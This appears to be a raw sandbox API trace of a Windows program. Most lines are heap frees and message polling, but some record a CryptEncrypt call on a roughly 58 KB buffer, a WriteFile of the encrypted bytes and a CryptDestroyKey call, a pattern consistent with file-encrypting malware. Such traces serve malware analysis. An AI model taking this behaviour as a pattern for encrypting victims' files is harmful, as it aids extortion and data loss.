[0212.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0212.127] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.128] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0212.128] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0212.128] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0212.128] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0212.128] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0212.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0212.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0212.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2acb1e8 | out: hHeap=0x2af0000) returned 1 [0212.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0212.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0212.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0212.131] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0212.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab260, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.132] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xe4ac, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xe4b0) returned 1 [0212.132] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.132] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.132] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.132] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.132] CharLowerBuffW (in: lpsz="byte[58544]", cchLength=0xb | out: lpsz="byte[58544]") returned 0xb [0212.132] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.134] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.134] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.134] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.134] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.134] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.134] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab278, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.135] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2acb1e8*, pdwDataLen=0x8cef60*=0xe4ac, dwBufLen=0xe4b0 | out: pbData=0x2acb1e8*, pdwDataLen=0x8cef60*=0xe4b0) returned 1 [0212.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.138] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.138] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.138] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.139] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.139] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.139] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.139] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.139] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.139] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.139] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.139] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.139] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.139] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.139] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.139] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.139] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.139] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.139] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.139] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.139] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.144] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.144] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.144] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.144] WriteFile (in: hFile=0x4f4, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0xe4b0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0xe4b0, lpOverlapped=0x0) returned 1 [0212.145] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.145] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.145] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0212.145] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.145] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0212.145] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.146] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.146] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.146] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0212.146] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.146] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0212.146] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0212.146] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0212.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaaf60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0212.146] CryptDestroyKey (hKey=0x9e21f8) returned 1 [0212.146] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.146] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.146] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.146] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.146] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.146] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.146] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.146] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.146] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.146] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.147] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.147] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.147] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.147] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.147] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.147] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0212.147] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.147] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0212.147] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0212.147] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.147] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.147] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.147] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.147] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.147] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.147] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.147] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.147] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.147] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.147] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.147] 